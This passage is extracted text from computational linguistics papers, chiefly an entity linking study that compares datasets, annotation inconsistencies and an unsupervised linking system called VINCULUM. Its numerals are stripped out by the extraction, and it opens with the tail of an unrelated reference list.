in: proceedings of the workshop on assurance cases, international conference on dependable systems and networks. available at https://www-users.cs.york.ac.uk/tpk/dsn .pdf . kim b, ayoub a, sokolsky o, lee i, jones p, zhang y, jetley r. . safety-assured development of the gpca infusion pump software. in: proceedings of the ninth acm international conference on embedded software, emsoft ’ . new york: acm, – doi . / . - - - - . kuramitsu k. . d-script: dependable scripting with deos process. in: ieee symposium on software reliability engineering workshops (issrew). piscataway: ieee, – . ruiz a, melzi a, kelly t. . systematic application of iso on a seooc: support by applying a systematic reuse approach. in: proceedings of the design, automation & test in europe conference & exhibition, date ’ . san jose: eda consortium, – . shida s, uchida a, ishii m, ide m, kuramitsu k. . assure-it: a runtime synchro- nization tool of assurance cases. in: safecomp fastabstract. available at https: //hal.archives-ouvertes.fr/hal- / . tokoro m (ed.) . open systems dependability: dependability engineering for ever- changing systems. second edition. boca raton: crc press. weaver r, mcdermid j, kelly t. . software safety arguments: towards a systematic categorisation of evidence. international system safety conference, denver, co. yuan t, kelly t. . argument-based approach to computer system safety engi- neering. international journal of critical computer-based systems ( ): – doi . /ijccbs. . . kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www-users.cs.york.ac.uk/tpk/dsn .pdf http://dx.doi.org/ . / . - - - - https://hal.archives-ouvertes.fr/hal- / https://hal.archives-ouvertes.fr/hal- / http://dx.doi.org/ . /ijccbs. . http://dx.doi.org/ . /peerj-cs. design challenges for entity linking xiao ling sameer singh university of washington, seattle wa {xiaoling,sameer,weld}@cs.washington.edu daniel s. weld abstract recent research on entity linking (el) has in- troduced a plethora of promising techniques, ranging from deep neural networks to joint in- ference. but despite numerous papers there is surprisingly little understanding of the state of the art in el. we attack this confusion by analyzing differences between several versions of the el problem and presenting a simple yet effective, modular, unsupervised system, called vinculum, for entity linking. we con- duct an extensive evaluation on nine data sets, comparing vinculum with two state-of-the- art systems, and elucidate key aspects of the system that include mention extraction, candi- date generation, entity type prediction, entity coreference, and coherence. introduction entity linking (el) is a central task in information extraction — given a textual passage, identify entity mentions (substrings corresponding to world entities) and link them to the corresponding entry in a given knowledge base (kb, e.g. wikipedia or freebase). for example, jetblue begins direct service between barnstable airport and jfk international. here, “jetblue” should be linked to the en- tity kb:jetblue, “barnstable airport” to kb:barnstable municipal airport, and “jfk international” to kb:john f. kennedy international airport . the links not only we use typewriter font, e.g., kb:entity, to indicate an entity in a particular kb, and quotes, e.g., “mention”, to denote textual mentions. provide semantic annotations to human readers but also a machine-consumable representation of the most basic semantic knowledge in the text. 
many other nlp applications can benefit from such links, such as distantly-supervised relation extraction (craven and kumlien, ; riedel et al., ; hoffmann et al., ; koch et al., ) that uses el to create training data, and some coreference systems that use el for disambiguation (hajishirzi et al., ; zheng et al., ; durrett and klein, ). unfortunately, in spite of numerous papers on the topic and several published data sets, there is surprisingly little understanding about state-of-the-art performance. we argue that there are three reasons for this con- fusion. first, there is no standard definition of the problem. a few variants have been studied in the liter- ature, such as wikification (milne and witten, ; ratinov et al., ; cheng and roth, ) which aims at linking noun phrases to wikipedia entities and named entity linking (aka named entity dis- ambiguation) (mcnamee and dang, ; hoffart et al., ) which targets only named entities. here we use the term entity linking as a unified name for both problems, and named entity linking (nel) for the subproblem of linking only named entities. but names are just one part of the problem. for many variants there are no annotation guidelines for scor- ing links. what types of entities are valid targets? when multiple entities are plausible for annotating a mention, which one should be chosen? are nested mentions allowed? without agreement on these is- sues, a fair comparison is elusive. secondly, it is almost impossible to assess ap- proaches, because systems are rarely compared using the same data sets. for instance, hoffart et al. ( ) transactions of the association for computational linguistics, vol. , pp. – , . action editor: kristina toutanova. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. developed a new data set (aida) based on the conll named entity recognition data set but failed to evaluate their system on msnbc previ- ously created by (cucerzan, ); wikifier (cheng and roth, ) compared to the authors’ previous system (ratinov et al., ) using the originally se- lected datasets but didn’t evaluate using aida data. finally, when two end-to-end systems are com- pared, it is rarely clear which aspect of a system makes one better than the other. this is especially problematic when authors introduce complex mech- anisms or nondeterministic methods that involve learning-based reranking or joint inference. to address these problems, we analyze several sig- nificant inconsistencies among the data sets. to have a better understanding of the importance of various techniques, we develop a simple and modular, un- supervised el system, vinculum. we compare vinculum to the two leading sophisticated el sys- tems on a comprehensive set of nine datasets. while our system does not consistently outperform the best el system, it does come remarkably close and serves as a simple and competitive baseline for future re- search. furthermore, we carry out an extensive ab- lation analysis, whose results illustrate ) even a near-trivial model using crosswikis (spitkovsky and chang, ) performs surprisingly well, and ) in- corporating a fine-grained set of entity types raises that level even higher. in summary, we make the following contributions: • we analyze the differences among several versions of the entity linking problem, compare existing data sets and discuss annotation inconsistencies between them. 
(sections & ) • we present a simple yet effective, modular, unsu- pervised system, vinculum, for entity linking. we make the implementation open source and pub- licly available for future research. (section ) • we compare vinculum to state-of-the-art sys- tems on an extensive evaluation of data sets. we also investigate several key aspects of the system including mention extraction, candidate genera- tion, entity type prediction, entity coreference, and coherence between entities. (section ) http://github.com/xiaoling/vinculum no standard benchmark in this section, we describe some of the key differ- ences amongst evaluations reported in existing litera- ture, and propose a candidate benchmark for el. . data sets nine data sets are in common use for el evaluation; we partition them into three groups. the uiuc group (ace and msnbc datasets) (ratinov et al., ), aida group (with dev and test sets) (hoffart et al., ), and tac-kbp group (with datasets rang- ing from the through competitions) (mc- namee and dang, ). their statistics are summa- rized in table . our set of nine is not exhaustive, but most other datasets, e.g. csaw (kulkarni et al., ) and aquaint (milne and witten, ), annotate com- mon concepts in addition to named entities. as we argue in sec. . , it is extremely difficult to define an- notation guidelines for common concepts, and there- fore they aren’t suitable for evaluation. for clarity, this paper focuses on linking named entities. sim- ilarly, we exclude datasets comprising tweets and other short-length documents, since radically differ- ent techniques are needed for the specialized corpora. table presents a list of recent el publications showing the data sets that they use for evaluation. the sparsity of this table is striking — apparently no system has reported the performance data from all three of the major evaluation groups. . knowledge base existing benchmarks have also varied considerably in the knowledge base used for link targets. wikipedia has been most commonly used (milne and wit- ten, ; ratinov et al., ; cheng and roth, ), however datasets were annotated using dif- ferent snapshots and subsets. other kbs include yago (hoffart et al., ), freebase (sil and yates, ), dbpedia (mendes et al., ) and a subset of wikipedia (mayfield et al., ). given that al- most all kbs are descendants of wikipedia, we use wikipedia as the base kb in this work. an online appendix containing details of the datasets is avail- able at https://github.com/xiaoling/vinculum/ raw/master/appendix.pdf. since the knowledge bases for all the data sets were around , we use wikipedia dump . http://github.com/xiaoling/vinculum https://github.com/xiaoling/vinculum/raw/master/appendix.pdf https://github.com/xiaoling/vinculum/raw/master/appendix.pdf group data set # of mentions entity types kb # of nils eval. metric uiuc ace any wikipedia topic wikipedia boc f msnbc any wikipedia topic wikipedia boc f aida aida-dev per,org,loc,misc yago accuracy aida-test per,org,loc,misc yago accuracy tac kbp tac pert ,orgt ,gpe tac ⊂ wiki accuracy tac pert ,orgt ,gpe tac ⊂ wiki accuracy tac t pert ,orgt ,gpe tac ⊂ wiki accuracy tac pert ,orgt ,gpe tac ⊂ wiki b + f tac pert ,orgt ,gpe tac ⊂ wiki b + f table : characteristics of the nine nel data sets. entity types: the aida data sets include named entities in four ner classes, person (per), organization (org), location (loc) and misc. 
in tac kbp data sets, both person (pert ) and organization entities (orgt ) are defined differently from their ner counterparts and geo-political entities (gpe), different from loc, exclude places like kb:central california. kb (sec. . ): the knowledge base used when each data was being developed. evaluation metric (sec. . ): bag-of-concept f is used as the evaluation metric in (ratinov et al., ; cheng and roth, ). b + f used in tac kbp measures the accuracy in terms of entity clusters, grouped by the mentions linked to the same entity. data set ace msnbc aida-test tac tac tac tac aquaint csaw cucerzan ( ) x milne and witten ( ) x kulkarni et al. ( ) x x ratinov et al. ( ) x x x hoffart et al. ( ) x han and sun ( ) x x he et al. ( a) x x he et al. ( b) x x x cheng and roth ( ) x x x x sil and yates ( ) x x x li et al. ( ) x x cornolti et al. ( ) x x x tac-kbp participants x x x x table : a sample of papers on entity linking with the data sets used in each paper (ordered chronologically). tac-kbp proceedings comprise additional papers (mcnamee and dang, ; ji et al., ; ji et al., ; mayfield et al., ). our intention is not to exhaust related work but to illustrate how sparse evaluation impedes comparison. nil entities: in spite of wikipedia’s size, there are many real-world entities that are absent from the kb. when such a target is missing for a mention, it is said to link to a nil entity (mcnamee and dang, ) (aka out-of-kb or unlinkable entity (hoffart et al., )). in the tac kbp, in addition to deter- mining if a mention has no entity in the kb to link, all the mentions that represent the same real world entities must be clustered together. since our focus is not to create new entities for the kb, nil clustering is beyond the scope of this paper. the aida data sets similarly contain such nil annotations whereas ace and msnbc omit these mentions altogether. we only evaluate whether a mention with no suitable entity in the kb is predicted as nil. . evaluation metrics while a variety of metrics have been used for evalu- ation, there is little agreement on which one to use. however, this detail is quite important, since the choice of metric strongly biases the results. we de- scribe the most common metrics below. bag-of-concept f (ace, msnbc): for each document, a gold bag of wikipedia entities is evalu- ated against a bag of system output entities requiring exact segmentation match. this metric may have its historical reason for comparison but is in fact flawed since it will obtain % f for an annotation in which every mention is linked to the wrong entity, but the bag of entities is the same as the gold bag. micro accuracy (tac , tac , tac t): for a list of given mentions, the metric simply measures the percentage of correctly predicted links. tac-kbp b + f (tac , tac ): the men- tions that are predicted as nil entities are required to be clustered according to their identities (nil cluster- ing). the overall data set is evaluated using a entity cluster-based b + f . ner-style f (aida): similar to official conll ner f evaluation, a link is considered correct only if the mention matches the gold boundary and the linked entity is also correct. a wrong link with the correct boundary penalizes both precision and recall. we note that bag-of-concept f is equivalent to the measure for concept-to-wikipedia task proposed in (cornolti et al., ) and ner-style f is the same as strong annotation match. in the experiments, we use the official metrics for the tac data sets and ner-style f for the rest. 
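as a concrete reading of the ner-style f (strong annotation match) metric described above, the following sketch counts a predicted link as correct only when both the mention boundary and the linked entity match the gold annotation exactly, so a wrong link with a correct boundary hurts both precision and recall. the tuple layout is our own assumption, not the format of any of the data sets.

```python
def ner_style_f1(gold, predicted):
    """gold, predicted: collections of (doc_id, start, end, entity) tuples.
    A predicted link is correct only if the mention boundary and the
    linked entity both match the gold annotation exactly."""
    gold, predicted = set(gold), set(predicted)
    tp = len(gold & predicted)
    precision = tp / len(predicted) if predicted else 0.0
    recall = tp / len(gold) if gold else 0.0
    if precision + recall == 0:
        return 0.0
    return 2 * precision * recall / (precision + recall)

# toy example: one boundary-correct but wrongly linked mention lowers both P and R
gold = [("d1", 0, 7, "KB:JetBlue"),
        ("d1", 40, 57, "KB:Barnstable_Municipal_Airport")]
pred = [("d1", 0, 7, "KB:JetBlue"),
        ("d1", 40, 57, "KB:Some_Other_Airport")]
print(round(ner_style_f1(gold, pred), 2))  # 0.5
```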
no annotation guidelines not only do we lack a common data set for evalua- tion, but most prior researchers fail to even define the problem under study, before developing algorithms. often an overly general statement such as annotat- ing the mentions to “referent wikipedia pages” or “corresponding entities” is used to describe which entity link is appropriate. this section shows that failure to have a detailed annotation guideline causes a number of key inconsistencies between data sets. a few assumptions are subtly made in different papers, which makes direct comparisons unfair and hard to comprehend. . entity mentions: common or named? which entities deserve links? some argue for re- stricting to named entities. others argue that any phrase that can be linked to a wikipedia entity adds value. without a clear answer to this issue, any data set created will be problematic. it’s not fair to pe- nalize a nel system for skipping a common noun phrases; nor would it be fair to lower the precision of a system that “incorrectly” links a common concept. however, we note that including mentions of com- mon concepts is actually quite problematic, since the choice is highly subjective. example in december , hoke was hired as the head football coach at san diego state uni- versity. (wikipedia) at first glance, kb:american football seems the gold-standard link. however, there is another entity kb:college football, which is clearly also, if not more, appropriate. if one argues that kb:college football should be the right choice given the context, what if kb:college football does not exist in the kb? should nil be returned in this case? the question is unanswered. for the rest of this paper, we focus on the (better defined) problem of solely linking named entities. aquaint and csaw are therefore not used for eval- uation due to an disproportionate number of common concept annotations. . how specific should linked entities be? it is important to resolve disagreement when more than one annotation is plausible. the tac- kbp annotation guidelines (tac, ) specify that different iterations of the same organization (e.g. the kb: th u.s. congress and the kb: th u.s. congress) should not be con- sidered as distinct entities. unfortunately, this is not a common standard shared across the data sets, where often the most specific possible entity is preferred. example adams and platt are both injured and will miss england’s opening world cup qualifier against moldova on sunday. (aida) here the mention “world cup” is labeled as kb: fifa world cup, a specific occur- rence of the event kb:fifa world cup. it is indeed difficult to decide how specific the gold link should be. given a static knowledge base, which is often incomplete, one cannot always find the most specific entity. for instance, there is no wikipedia page for the kb: th u.s. congress be- cause the congress has not been elected yet. on the other hand, using general concepts can cause troubles for machine reading. consider president-of relation extraction on the following sentence. example joe biden is the senate president in the th united states congress. note that linking common noun phrases is closely related to word sense disambiguation (moro et al., ). we define named entity mention extensionally: any name uniquely referring to one entity of a predefined class, e.g. a specific person or location. person common concepts e.g. brain_tumor, desk, water, etc. 
misc.organization location tac gpe (geo- political entities) tac organization tac person figure : entities divided by their types. for named enti- ties, the solid squares represent conll(aida) classes; the red dashed squares display tac classes; the shaded rectangle depicts common concepts. failure to distinguish different congress iterations would cause an information extraction system to falsely extracting the fact that kb:joe biden is the senate president of the kb:united states congress at all times! . metonymy another situation in which more than one annotation is plausible is metonymy, which is a way of referring to an entity not by its own name but rather a name of some other entity it is associated with. a common example is to refer to a country’s government using its capital city. example moscow’s as yet undisclosed propos- als on chechnya’s political future have , mean- while, been sent back to do the rounds of various government departments. (aida) the mention here, “moscow”, is labeled as kb:government of russia in aida. if this sentence were annotated in tac-kbp, it would have been labeled as kb:moscow (the city) instead. even the country kb:russia seems to be a valid label. however, neither the city nor the country can ac- tually make a proposal. the real entity in play is kb:government of russia. . named entities, but of what types? even in the data sets consisting of solely named en- tities, the types of the entities vary and therefore the data distribution differs. tac-kbp has a clear definition of what types of entities require links, namely person, organization and geo-political enti- ties. aida, which adopted the ner data set from the conll shared task, includes entities from classes, person, organization, location and misc. com- http://www.cnts.ua.ac.be/conll /ner/ annotation.txt pared to the aida entity types, it is obvious that tac- kbp is more restrictive, since it does not have misc. entities (e.g. kb:fifa world cup). moreover, tac entities don’t include fictional characters or organizations, such as kb:sherlock holmes. tac gpes include some geographical regions, such as kb:france, but exclude those without govern- ments, such as kb:central california or lo- cations such as kb:murrayfield stadium. figure summarizes the substantial differences be- tween the two type sets. . can mention boundaries overlap? we often see one entity mention nested in another. for instance, a u.s. city is often followed by its state, such as “portland, oregon”. one can split the whole mention to individual ones, “portland” for the city and “oregon” for the city’s state. aida adopts this segmentation. however, annotations in an early tac- kbp dataset ( ) select the whole span as the men- tion. we argue that all three mentions make sense. in fact, knowing the structure of the mention would facilitate the disambiguation (i.e. the state name pro- vides enough context to uniquely identify the city entity). besides the mention segmentation, the links for the nested entities may also be ambiguous. example dorothy byrne, a state coordinator for the florida green party, said she had been in- undated with angry phone calls and e-mails from democrats, but has yet to receive one regretful note from a nader voter. the gold annotation from ace is kb:green party of florida even though the mention doesn’t contain “florida” and can arguably be linked to kb:us green party. 
a simple & modular linking method in this section, we present vinculum, a simple, unsupervised el system that performs compara- bly to the state of the art. as input, vinculum takes a plain-text document d and outputs a set of segmented mentions with their associated entities ad = {(mi, li)}. vinculum begins with mention extraction. for each identified mention m, candi- date entities cm = {cj} are generated for linking. vinculum assigns each candidate a linking score http://nlp.cs.rpi.edu/kbp/ /elquery.pdf http://www.cnts.ua.ac.be/conll /ner/annotation.txt http://www.cnts.ua.ac.be/conll /ner/annotation.txt http://nlp.cs.rpi.edu/kbp/ /elquery.pdf candidate generation entity type coreference coherence mention phrases less context sentence document world knowledge more context all possible entities one most likely entity figure : the process of finding the best entity for a mention. all possible entities are sifted through as vinculum proceeds at each stage with a widening range of context in consideration. s(cj|m,d) based on the entity type compatibility, its coreference mentions, and other entity links around this mention. the candidate entity with the maxi- mum score, i.e. l = arg max c∈cm s(c|m,d), is picked as the predicted link of m. figure illustrates the linking pipeline that follows mention extraction. for each mention, vinculum ranks the candidates at each stage based on an ever widening context. for example, candidate generation (section . ) merely uses the mention string, entity typing (section . ) uses the sentence, while corefer- ence (section . ) and coherence (section . ) use the full document and web respectively. our pipeline mimics the sieve structure introduced in (lee et al., ), but instead of merging coreference clusters, we adjust the probability of candidate entities at each stage. the modularity of vinculum enables us to study the relative impact of its subcomponents. . mention extraction the first step of el extracts potential mentions from the document. since vinculum restricts attention to named entities, we use a named entity recogni- tion (ner) system (finkel et al., ). alternatively, an np chunker may be used to identify the mentions. . dictionary-based candidate generation while in theory a mention could link to any entity in the kb, in practice one sacrifices little by restricting attention to a subset (dozens) precompiled using a dictionary. a common way to build such a dictionary d is by crawling web pages and aggregating anchor links that point to wikipedia pages. the frequency with which a mention (anchor text), m, links to a par- ticular entity (anchor link), c, allows one to estimate the conditional probability p(c|m). we adopt the crosswikis dictionary, which was computed from a google crawl of the web (spitkovsky and chang, ). the dictionary contains more than million unique strings with the entities they may represent. in the literature, the dictionary is often built from the anchor links within the wikipedia website (e.g., (ratinov et al., ; hoffart et al., )). in addition, we employ two small but precise dic- tionaries for u.s. state abbreviations and demonyms when the mention satisfies certain conditions. for u.s. state abbreviations, a comma before the men- tion is required. for demonyms, we ensure that the mention is either an adjective or a plural noun. . 
incorporating entity types for an ambiguous mention such as “washington”, knowing that the mention denotes a person allows an el system to promote kb:george washington while lowering the rank of the capital city in the candi- date list. we incorporate this intuition by combining it probabilistically with the crosswikis prior. p(c|m,s) = ∑ t∈t p(c,t|m,s) = ∑ t∈t p(c|m,t,s)p(t|m,s) , where s denotes the sentence containing this men- tion m and t represents the set of all possible types. we assume the candidate c and the sentential con- text s are conditionally independent if both the men- tion m and its type t are given. in other words, p(c|m,t,s) = p(c|m,t), the rhs of which can be estimated by renormalizing p(c|m) w.r.t. type t: p(c|m,t) = p(c|m)∑ c →t p(c|m) , where c → t indicates that t is one of c’s entity types. the other part of the equation, p(t|m,s), can be estimated by any off-the-shelf named entity recognition system, e.g. finkel et al. ( ) and ling and weld ( ). . coreference it is common for entities to be mentioned more than once in a document. since some mentions are less ambiguous than others, it makes sense to use the we notice that an entity often has multiple appropriate types, e.g. a school can be either an organization or a location depend- ing on the context. we use freebase to provide the entity types and map them appropriately to the target type set. most representative mention for linking. to this end, vinculum applies a coreference resolution system (e.g. lee et al. ( )) to cluster coreferent mentions. the representative mention of a cluster is chosen for linking. while there are more sophisticated ways to integrate el and coreference (hajishirzi et al., ), vinculum’s pipeline is simple and modular. . coherence when kb:barack obama appears in a document, it is more likely that the mention “washington” rep- resents the capital kb:washington, d.c. as the two entities are semantically related, and hence the joint assignment is coherent. a number of re- searchers found inclusion of some version of coher- ence is beneficial for el (cucerzan, ; milne and witten, ; ratinov et al., ; hoffart et al., ; cheng and roth, ). for incorporating it in vinculum, we seek a document-wise assignment of entity links that maximizes the sum of the coher- ence scores between each pair of entity links pre- dicted in the document d, i.e. ∑ ≤i<j≤|md| φ(lmi, lmj ) where φ is a function that measures the coherence between two entities, md denotes the set of all the mentions detected in d and lmi (lmj ) is one of the candidates of mi(mj). instead of searching for the exact solution in a brute-force manner (o(|c||md|) where |c| = max m∈md |cm|), we isolate each mention and greedily look for the best candidate by fixing the predictions of other mentions, allowing linear time search (o(|c| · |md|)). specifically, for a mention m and each of its candidates, we compute a score, coh(c) = |pd|− ∑ p∈pd\{pm} φ(p,c),c ∈ cm, where pd is the union of all intermediate links {pm} in the document. since both measures take values between and , we denote the coherence score coh(c) as pφ(c|pd), the conditional probability of an entity given other entities in the document. the final score of a can- note that the representative mention in coreference reso- lution is not always the best mention for linking. when the representative mention contains a relative clause, we use the submention without the clause, which is favorable for candidate generation. 
when the representative mention is a location, a longer, non-conjunctive mention is preferred if possible. we also apply some heuristics to find organization acronyms, etc. didate is the sum of coherence pφ(c|pd) and type compatibility p(c|m,s). two coherence measures have been found to be useful: normalized google distance (ngd) (milne and witten, ; ratinov et al., ) and rela- tional score (cheng and roth, ). ngd be- tween two entities ci and cj is defined based on the link structure between wikipedia articles as follows: φngd(ci,cj) = − log(max(|li|,|li|))−log(|li∩lj|)log(w)−log(min(|li|,|li|)) where li and lj are the incoming (or outgoing) links in the wikipedia articles for ci and cj respectively and w is the total number of entities in wikipedia. the relational score between two entities is a binary indicator whether a relation exists between them. we use freebase as the source of the relation triples f = {(sub,rel,obj)}. relational coherence φrel is thus defined as φrel(ei,ej) = { ∃r,(ei,r,ej) or (ej,r,ei) ∈ f otherwise. experiments in this section, we present experiments to address the following questions: • is ner sufficient to identify mentions? (sec. . ) • how much does candidate generation affect final el performance? (sec. . ) • how much does entity type prediction help el? what type set is most appropriate? (sec. . ) • how much does coherence improve the el results? (sec. . ) • how well does vinculum perform compared to the state-of-the-art? (sec. . ) • finally, which of vinculum’s components con- tribute the most to its performance? (sec. . ) . mention extraction we start by using stanford ner for mention extrac- tion and measure its efficacy by the recall of correct mentions shown in table . tac data sets are not included because the mention strings are given in that competition. the results indicate that at least % of the gold-standard mentions are left out when ner, the mapping between freebase and wikipedia is provided at https://developers.google.com/freebase. https://developers.google.com/freebase ace msnbc aida-dev aida-test r p r p r p r p ner . . . . . . . . +np . . . . . . . . +dp . . . . . . . . +np+dp . . . . . . . . table : performance(%, r: recall; p: precision) of the correct mentions using different mention extraction strategies. ace and msnbc only annotate a subset of all the mentions and therefore the absolute values of precision are largely underestimated. alone, is used to detect mentions. some of the miss- ing mentions are noun phrases without capitalization, a well-known limitation of automated extractors. to recover them, we experiment with an np chunker (np) and a deterministic noun phrase extractor based on parse trees (dp). although we expect them to introduce spurious mentions, the purpose is to esti- mate an upper bound for mention recall. the results confirm the intuition: both methods improve recall, but the effect on precision is prohibitive. therefore, we only use ner in subsequent experiments. note that the recall of mention extraction is an upper bound of the recall of end-to-end predictions. . candidate generation in this section, we inspect the performance of can- didate generation. we compare crosswikis with an intra-wikipedia dictionary and freebase search api . each candidate generation component takes a mention string as input and returns an ordered list of candidate entities representing the mention. 
the candidates produced by crosswikis and the intra- wikipedia dictionary are ordered by their conditional probabilities given the mention string. freebase api provides scores for the entities using a combination of text similarity and an in-house entity relevance score. we compute candidates for the union of all the non-nil mentions from all data sets and mea- sure their efficacy by recall@k. from figure , it is clear that crosswikis outperforms both the intra- wikipedia dictionary and freebase search api for almost all k. the intra-wikipedia dictionary is on a par with crosswikis at k = but in general has a opennlp np chunker: opennlp.apache.org adopted from aida (hoffart et al., ) https://www.googleapis.com/freebase/v / search, restricted to no more than candidates per query. inf . . . . k r e c a ll @ k crosswikis intra−wikipedia freebase search figure : recall@k on an aggregate of nine data sets, comparing three candidate generation methods. inf . . . . k r e c a ll @ k msnbc ace aida−dev aida−test tac tac tac t tac tac figure : recall@k using crosswikis for candidate gen- eration, split by data set. is chosen to be the cut-off value in consideration of both efficiency and accuracy. lower coverage of the gold candidates compared to crosswikis . freebase api offers a better coverage than the intra-wikipedia dictionary but is less effi- cient than crosswikis. in other words, freebase api needs a larger cut-off value to include the gold entity in the candidate set. using crosswikis for candidate generation, we plot the recall@k curves per data set (figure ). to our surprise, in most data sets, crosswikis alone can achieve more than % recall@ . the only excep- tions are tac and tac because the organizers intentionally selected the mentions that are highly ambiguous such as “abc” and/or incomplete such as “brown”. for efficiency, we set a cut-off threshold at (> % recall for all but one data set). note that crosswikis itself can be used a context-insensitive el system by looking up the mention string and predict- ing the entity with the highest conditional probability. the second row in table presents the results using this simple baseline. crosswikis alone, using only the mention string, has a fairly reasonable performance. we also compared to another intra-wikipedia dictionary (table in (ratinov et al., )). a recall of . % and . % is reported for ace and msnbc, respectively, at a cut- off level of . crosswikis has a recall of . % and . % at the same cut-off. opennlp.apache.org https://www.googleapis.com/freebase/v /search https://www.googleapis.com/freebase/v /search approach tac tac tac t tac tac aida-dev aida-test ace msnbc crosswikis only . . . . . . . . . +ner . . . . . . . . . +figer . . . . . . . . . +ner(gold) . . . . . . . . . +figer(gold) . . . . . . . . . table : performance (%) after incorporating entity types, comparing two sets of entity types (ner and figer). using a set of fine-grained entity types (figer) generally achieves better results. . incorporating entity types here we investigate the impact of the entity types on the linking performance. the most obvious choice is the traditional ner types (tner = {per, org, loc, misc}). to predict the types of the mentions, we run stanford ner (finkel et al., ) and set the predicted type tm of each mention m to have probability (i.e. p(tm|m,s) = ). as to the types of the entities, we map their freebase types to the four ner types . 
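To make the type-based re-scoring concrete, a minimal sketch is given below; the candidate names, type assignments and probabilities are invented for illustration, and the function is a simplified stand-in rather than the actual implementation:

# Sketch of the re-scoring described above: the prior p(c|m) is renormalized
# within each entity type t and combined with the type probabilities p(t|m,s)
# produced by an external tagger (NER or FIGER). All values are illustrative.
def type_aware_score(prior, entity_types, type_probs):
    # prior: {candidate: p(c|m)}; entity_types: {candidate: set of types};
    # type_probs: {type: p(t|m,s)}; returns {candidate: p(c|m,s)}
    scores = {c: 0.0 for c in prior}
    for t, p_t in type_probs.items():
        pool = [c for c in prior if t in entity_types.get(c, set())]
        z = sum(prior[c] for c in pool)
        if z == 0.0:
            continue
        for c in pool:
            scores[c] += (prior[c] / z) * p_t   # p(c|m,t) * p(t|m,s)
    return scores

scores = type_aware_score(
    prior={"kb:washington,_d.c.": 0.55, "kb:george_washington": 0.25},
    entity_types={"kb:washington,_d.c.": {"location"},
                  "kb:george_washington": {"person"}},
    type_probs={"person": 0.9, "location": 0.1},
)
# With a confident "person" prediction, kb:george_washington now outranks the city.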
a more appropriate choice is fine-grained en- tity types introduced by ling and weld ( ) in figer, a publicly available package . these fine- grained types are not disjoint, i.e. each mention is allowed to have more than one type. for each men- tion, figer returns a set of types, each of which is accompanied by a score, tfiger(m) = {(tj,gj) : tj ∈ tfiger}. a softmax function is used to proba- bilistically interpret the results as follows: p(tj|m,s) = { z exp(gj) if (tj,gj) ∈ tfiger(m), otherwise where z = ∑ (tk,gk)∈tfiger(m) exp(gk). we evaluate the utility of entity types in table , which shows that using ner typically worsens the performance. this drop may be attributed to the rigid binary values for type incorporation; it is hard to output the probabilities of the entity types for a mention given the chain model adopted in stanford ner. we also notice that figer types consistently improve the results across the data sets, indicating that a finer-grained type set may be more suitable for the entity linking task. to further confirm this assertion, we simulate the scenario where the gold types are provided for each the freebase types “/person/*” are mapped to per, “/lo- cation/*” to loc, “/organization/*” plus a few others like “/sports/sports team” to org, and the rest to misc. http://github.com/xiaoling/figer mention (the oracle types of its gold entity). the per- formance is significantly boosted with the assistance from the gold types, which suggests that a better per- forming ner/figer system can further improve performance. similarly, we notice that the results using figer types almost consistently outperform the ones using ner types. this observation endorses our previous recommendation of using fine-grained types for el tasks. . coherence two coherence measures suggested in section . are tested in isolation to better understand their effects in terms of the linking performance (table ). in gen- eral, the link-based ngd works slightly better than the relational facts in out of data sets (comparing row “+ngd” with row “+rel”). we hypothesize that the inferior results of rel may be due to the in- completeness of freebase triples, which makes it less robust than ngd. we also combine the two by taking the average score, which in most data set performs the best (“+both”), indicating that two measures provide complementary source of information. . overall performance to answer the last question of how well does vinculum perform overall, we conduct an end-to- end comparison against two publicly available sys- tems with leading performance: aida (hoffart et al., ): we use the recom- mended graph variant of the aida package (ver- sion . . ) and are able to replicate their results when gold-standard mentions are given. we are also aware of other systems such as tagme- (fer- ragina and scaiella, ), dbpedia spotlight (mendes et al., ) and wikipediaminer (milne and witten, ). a trial test on the aida data set shows that both wikifier and aida tops the performance of other systems reported in (cornolti et al., ) and therefore it is sufficient to compare with these two systems in the evaluation. http://github.com/xiaoling/figer approach tac tac tac t tac tac aida-dev aida-test ace msnbc no coh . . . . . . . . . +ngd . . . . . . . . . +rel . . . . . . . . . +both . . . . . . . . . table : performance (%) after re-ranking candidates using coherence scores, comparing two coherence measures (ngd and rel). “no coh”: no coherence based re-ranking is used. 
“+both”: an average of two scores is used for re-ranking. coherence in general helps: a combination of both measures often achieves the best effect and ngd has a slight advantage over rel. approach tac tac tac t tac tac aida-dev aida-test ace msnbc overall crosswikis . . . . . . . . . . +figer . . . . . . . . . . +coref . . . . . . . . . . +coherence =vinculum . . . . . . . . . . aida . . . . . . . . . . wikifier . . . . . . . . . . table : end-to-end performance (%): we compare vinculum in different stages with two state-of-the-art systems, aida and wikifier. the column “overall” lists the average performance of nine data sets for each approach. crosswikis appears to be a strong baseline. vinculum is . % shy from wikifier, each winning in four data sets; aida tops both vinculum and wikifier on aida-test. wikifier (cheng and roth, ): we are able to reproduce the reported results on ace and msnbc and obtain a close enough b + f number on tac ( . % vs . %). since wikifier overgenerates mentions and produce links for common concepts, we restrict its output on the aida data to the men- tions that stanford ner predicts. table shows the performance of vinculum after each stage of candidate generation (cross- wikis), entity type prediction (+figer), coreference (+coref) and coherence (+coherence). the column “overall” displays the average of the performance numbers for nine data sets for each approach. wiki- fier achieves the highest in the overall performance. vinculum performs quite comparably, only . % shy from wikifier, despite its simplicity and un- supervised nature. looking at the performance per data set, vinculum and wikifier each is superior in out of data sets while aida tops the perfor- mance only on aida-test. the performance of all the systems on tac is generally lower than on the other dataset, mainly because of a low recall in the candidate generation stage. we notice that even using crosswikis alone works pretty well, indicating a strong baseline for future comparisons. the entity type prediction provides the highest boost on performance, an absolute . % increase, among other subcomponents. the corefer- ence stage and the coherence stage also give a rea- sonable lift. in terms of running time, vinculum runs reason- ably fast. for a document with - entity mentions on average, vinculum takes only a few seconds to finish the linking process on one single thread. . system analysis we outline the differences between the three system architectures in table . for identifying mentions to link, both vinculum and aida rely solely on ner detected mentions, while wikifier additionally in- cludes common noun phrases, and trains a classifier to determine whether a mention should be linked. for candidate generation, crosswikis provides better coverage of entity mentions. for example, in fig- ure , we observe a recall of . % at a cut-off of by crosswikis, outperforming . % by aida’s dictionary. further, hoffart et al. ( ) report a precision of . % using gold mentions on aida- test, while crosswikis achieves a higher precision at . %. both aida and wikifier use coarse ner types as features, while vinculum incorpo- rates fine-grained types that lead to dramatically im- proved performance, as shown in section . . 
